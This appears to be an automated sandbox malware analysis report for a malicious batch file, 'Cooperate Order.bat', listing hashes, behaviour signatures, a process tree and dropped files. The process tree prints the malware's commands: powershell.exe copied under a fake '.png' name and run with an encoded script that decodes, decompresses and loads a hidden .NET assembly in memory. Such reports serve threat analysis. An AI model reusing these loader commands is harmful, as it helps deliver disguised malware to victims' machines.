862a1531be831680c2d17fb1a87f21d954b7acf60ffffb75e9adc5c2c73efa65

General

Target

Cooperate Order.bat
Size

1.7MB
MD5

8e62541b4ad90e7320a908ba27023d50
SHA1

6ec1bd3040d35cad7d4a75f4ad7d10dee7f38085
SHA256

b10e325e1ba0a35a881e546c6fbedd3be9736bc42ec6f4c8e0bcdbb989ea2b14
SHA512

ded7c481cfa2cc971e9db845247f6c489fedc621f037e6a0c91153e6bcdff0ab38d63a75443f1f42297b88d32eac6c69d6323614a9fdf1ddc72bad111dd8da07
SSDEEP

24576:1bhlV1Oicaf/E/T9yK0vjMidwOLTsqIzibAVSYveHpazGDorvmrfOajhMoc+rmA2:30iKxrOvwiTIrhu7ZKPX+cW4

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2764	Ypesoxstvb.png

Loads dropped DLL 1 IoCs

pid	Process
1728	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2764	Ypesoxstvb.png

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	Ypesoxstvb.png

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 2900	1704	cmd.exe	29
PID 1704 wrote to memory of 2900	1704	cmd.exe	29
PID 1704 wrote to memory of 2900	1704	cmd.exe	29
PID 1704 wrote to memory of 2720	1704	cmd.exe	30
PID 1704 wrote to memory of 2720	1704	cmd.exe	30
PID 1704 wrote to memory of 2720	1704	cmd.exe	30
PID 1704 wrote to memory of 1728	1704	cmd.exe	31
PID 1704 wrote to memory of 1728	1704	cmd.exe	31
PID 1704 wrote to memory of 1728	1704	cmd.exe	31
PID 1728 wrote to memory of 2664	1728	cmd.exe	33
PID 1728 wrote to memory of 2664	1728	cmd.exe	33
PID 1728 wrote to memory of 2664	1728	cmd.exe	33
PID 1728 wrote to memory of 2676	1728	cmd.exe	34
PID 1728 wrote to memory of 2676	1728	cmd.exe	34
PID 1728 wrote to memory of 2676	1728	cmd.exe	34
PID 1728 wrote to memory of 2744	1728	cmd.exe	35
PID 1728 wrote to memory of 2744	1728	cmd.exe	35
PID 1728 wrote to memory of 2744	1728	cmd.exe	35
PID 1728 wrote to memory of 2748	1728	cmd.exe	36
PID 1728 wrote to memory of 2748	1728	cmd.exe	36
PID 1728 wrote to memory of 2748	1728	cmd.exe	36
PID 1728 wrote to memory of 2764	1728	cmd.exe	37
PID 1728 wrote to memory of 2764	1728	cmd.exe	37
PID 1728 wrote to memory of 2764	1728	cmd.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Cooperate Order.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo F "
  2⤵
  PID:2900
- C:\Windows\system32\xcopy.exe
  xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png
  2⤵
  PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Cooperate Order.bat"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:2664
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png
    3⤵
    PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo F "
    3⤵
    PID:2744
- - C:\Windows\system32\xcopy.exe
    xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\Cooperate Order.bat" C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png.bat
    3⤵
    PID:2748
- - C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png
    C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png -win 1 -enc JABKAGQAbwBxAGEAbQB0AGkAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAUgB1AGMAZwByAHgAdgBrAGYAdwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEoAZABvAHEAYQBtAHQAaQApADsAJABKAGIAawByAHMAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAUgB1AGMAZwByAHgAdgBrAGYAdwBxACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFIAYwBjAHUAawBtAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASgBiAGsAcgBzAGYALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFIAYwBjAHUAawBtAHcALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFIAYwBjAHUAawBtAHcALgBDAGwAbwBzAGUAKAApADsAJABKAGIAawByAHMAZgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFIAdQBjAGcAcgB4AHYAawBmAHcAcQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABSAHUAYwBnAHIAeAB2AGsAZgB3AHEAKQA7ACAAJABPAGMAbwBjAHMAYgByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFIAdQBjAGcAcgB4AHYAawBmAHcAcQApADsAIAAkAEIAZgBzAGcAcwBmAHYAIAA9ACAAJABPAGMAbwBjAHMAYgByAC4ARwBlAHQARQB4AHAAbwByAHQAZQBkAFQAeQBwAGUAcwAoACkAWwAwAF0AOwAgACQARAB4AHIAcQBiAGYAbQBpACAAPQAgACQAQgBmAHMAZwBzAGYAdgAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Local\Temp\Ypesoxstvb.png

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2764-9-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-10-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2764-11-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2764-12-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-13-0x000000001B000000-0x000000001B2E2000-memory.dmp

Filesize
2.9MB

Download
memory/2764-14-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2764-15-0x0000000002230000-0x0000000002238000-memory.dmp

Filesize
32KB

Download
memory/2764-16-0x0000000002550000-0x00000000025D0000-memory.dmp

Filesize
512KB

Download
memory/2764-17-0x000007FEF56C0000-0x000007FEF605D000-memory.dmp

Filesize
9.6MB

Download

Resubmissions

Analysis

Sharing